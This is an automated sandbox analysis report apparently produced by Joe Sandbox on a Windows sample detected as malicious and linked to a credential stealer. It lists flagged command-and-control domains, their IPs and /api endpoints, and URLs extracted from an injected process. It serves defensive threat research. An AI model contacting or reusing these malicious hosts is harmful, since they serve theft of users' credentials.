https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://medal.tv	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
treatynreit.site	104.21.84.18	true	true	unknown
snarlypagowo.site	172.67.183.74	true	true	unknown
questionsmw.store	172.67.208.141	true	true	unknown
mysterisop.site	104.21.21.3	true	true	unknown
absorptioniw.site	104.21.17.174	true	true	unknown
steamcommunity.com	104.102.49.254	true	false	unknown
abnomalrkmu.site	104.21.56.150	true	true	unknown
gravvitywio.store	172.67.209.193	true	true	unknown
nurserrsjwuwq.shop	188.114.97.3	true	true	unknown
soldiefieop.site	188.114.97.3	true	true	unknown
chorusarorp.site	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://mysterisop.site/api	true		unknown
https://abnomalrkmu.site/api	true		unknown
abnomalrkmu.site	true		unknown
https://soldiefieop.site/api	true		unknown
https://nurserrsjwuwq.shop/api	true		unknown
absorptioniw.site	true		unknown
treatynreit.site	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
questionsmw.stor	true		unknown
nurserrsjwuwq.shop	true		unknown
https://treatynreit.site/api	true		unknown
https://gravvitywio.store/api	true		unknown
snarlypagowo.site	true		unknown
chorusarorp.site	true		unknown
https://absorptioniw.site/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://player.vimeo.com	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	BitLockerToGo.exe, 00000002.00000003.2365814090.0000000003124000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://gravvitywio.store/api.Op	BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/subscriber_agreement/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3	BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.youtube.com	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.akamai	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2589207025.000000000313F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://gravvitywio.store/	BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://abnomalrkmu.site/	BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s.ytimg.com;	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.certum.pl/CPS0	klFMCT64RF.exe	false	URL Reputation: safe	unknown
https://community.akamai.steamsta	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2589207025.000000000313F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steam.tv/	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cevcsca2021.ocsp-certum.com07	klFMCT64RF.exe	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/points/shop/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	klFMCT64RF.exe	false		unknown
https://sketchfab.com	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://lv.queniujq.cn	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://absorptioniw.site/apiK	BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://soldiefieop.site/	BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/recaptcha/	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://questionsmw.store/	BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://abnomalrkmu.site/apii	BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nurserrsjwuwq.shop/api4	BitLockerToGo.exe, 00000002.00000003.2288076876.00000000030C7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/;	BitLockerToGo.exe, 00000002.00000003.2365814090.0000000003124000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://soldiefieop.site/api.Op	BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/about/	BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/market/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/news/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK	BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://protobuf.dev/reference/go/faq#namespace-conflictpkcs7:	klFMCT64RF.exe	false		unknown
https://abnomalrkmu.site/7	BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/subscriber_agreement/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net/recaptcha/;	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://repository.certum.pl/cevcsca2021.cer0	klFMCT64RF.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/discussions/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/stats/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://medal.tv	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://broadcast.st.dl.eccdnx.com	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com02	klFMCT64RF.exe	false		unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.certum.pl/ctnca2.crl0l	klFMCT64RF.exe	false		unknown
http://repository.certum.pl/ctnca2.cer09	klFMCT64RF.exe	false		unknown
https://steamcommunity.com/workshop/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://login.steampowered.com/	BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/legal/	BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.84.18	treatynreit.site	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	nurserrsjwuwq.shop	European Union	13335	CLOUDFLARENETUS	true
104.21.17.174	absorptioniw.site	United States	13335	CLOUDFLARENETUS	true
104.21.21.3	mysterisop.site	United States	13335	CLOUDFLARENETUS	true
172.67.208.141	questionsmw.store	United States	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
172.67.209.193	gravvitywio.store	United States	13335	CLOUDFLARENETUS	true
104.21.56.150	abnomalrkmu.site	United States	13335	CLOUDFLARENETUS	true
172.67.183.74	snarlypagowo.site	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524041
Start date and time:	2024-10-02 15:09:44 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	klFMCT64RF.exe renamed because original name is a hash value
Original Sample Name:	6275fdc6cb613300c08ef09917a6dcd2da5eb1fef5e20bdd214fd9fefeafd8fb.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@11/9
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 83% Number of executed functions: 9 Number of non-executed functions: 231
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target klFMCT64RF.exe, PID 6544 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: klFMCT64RF.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.84.18	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	markuschop.fun/api
